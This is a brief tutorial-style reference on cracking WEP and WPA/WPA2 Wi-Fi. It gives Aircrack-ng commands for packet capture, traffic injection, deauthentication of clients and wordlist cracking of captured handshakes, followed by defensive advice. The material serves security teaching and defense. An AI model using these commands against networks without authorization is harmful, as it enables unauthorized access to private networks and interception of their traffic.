WEP/WPA Hacking
1 Global Definition
WEP and WPA are wireless network security protocols used to protect Wi-Fi communications. WEP/WPA Hacking refers to the techniques attackers use to crack Wi-Fi passwords, intercept communications, or exploit weak encryption mechanisms to gain unauthorized network access.
1.1 Key Concepts
- SSID: The Wi-Fi network name broadcasted by access points.
- Handshake: A cryptographic exchange between client and access point during authentication.
- Dictionary Attack: Testing passwords from a list of common words against a captured handshake.
- Brute-Force Attack: Trying all possible character combinations until the correct password is found.
- Aircrack-ng Suite: A popular toolset for Wi-Fi password cracking.
1.2 WEP Hacking
WEP is outdated and extremely vulnerable due to weak IV handling. Attackers exploit this by capturing enough traffic and using statistical attacks to recover the key.
# Capturing packets
airodump-ng wlan0
# Injecting traffic to speed up IV collection
aireplay-ng -3 -b [TARGET_BSSID] -h [ATTACKER_MAC] wlan0
# Cracking WEP key
aircrack-ng capture.cap
1.3 WPA/WPA2 Hacking
WPA and WPA2 are stronger than WEP, but still vulnerable to certain attacks if weak passwords are used. The most common attack involves capturing the 4-way handshake and attempting to crack it offline using wordlists or brute-force.
# Capturing handshake
airodump-ng --bssid [TARGET_BSSID] -c [CHANNEL] -w capture wlan0
# Forcing client to reconnect (deauth attack)
aireplay-ng -0 5 -a [TARGET_BSSID] -c [CLIENT_MAC] wlan0
# Cracking WPA/WPA2 password with wordlist
aircrack-ng -w rockyou.txt -b [TARGET_BSSID] capture.cap
1.4 WPA3 and Modern Protections
WPA3 was introduced to fix WPA2 weaknesses. It uses SAE to resist offline dictionary attacks. However, WPA3 adoption is still not universal, and downgrade attacks can sometimes force a device to fall back to WPA2.
1.5 Tools for WEP/WPA Hacking
- Aircrack-ng: Suite for capturing and cracking WEP/WPA handshakes.
- Hashcat: GPU-accelerated password cracking tool for WPA handshakes.
- Wireshark: Packet analyzer to inspect wireless traffic.
- Reaver: Exploits WPS vulnerabilities for WPA key recovery.
- Kismet: Wireless network detector and packet sniffer.
1.6 Defense Mechanisms
- Always use WPA3 where available.
- Disable WEP and WPA/WPA2-PSK networks entirely.
- Use strong, unique Wi-Fi passwords (not in dictionaries).
- Disable WPS to prevent Reaver-style attacks.
- Enable network monitoring with IDS/IPS to detect deauthentication and packet injection attempts.
1.7 Why It Matters
Wi-Fi security is often the weakest link in a network. Cracking weak Wi-Fi passwords can give attackers full access to internal systems, bypassing firewalls. Understanding WEP/WPA hacking is crucial for penetration testers and defenders to secure wireless infrastructures.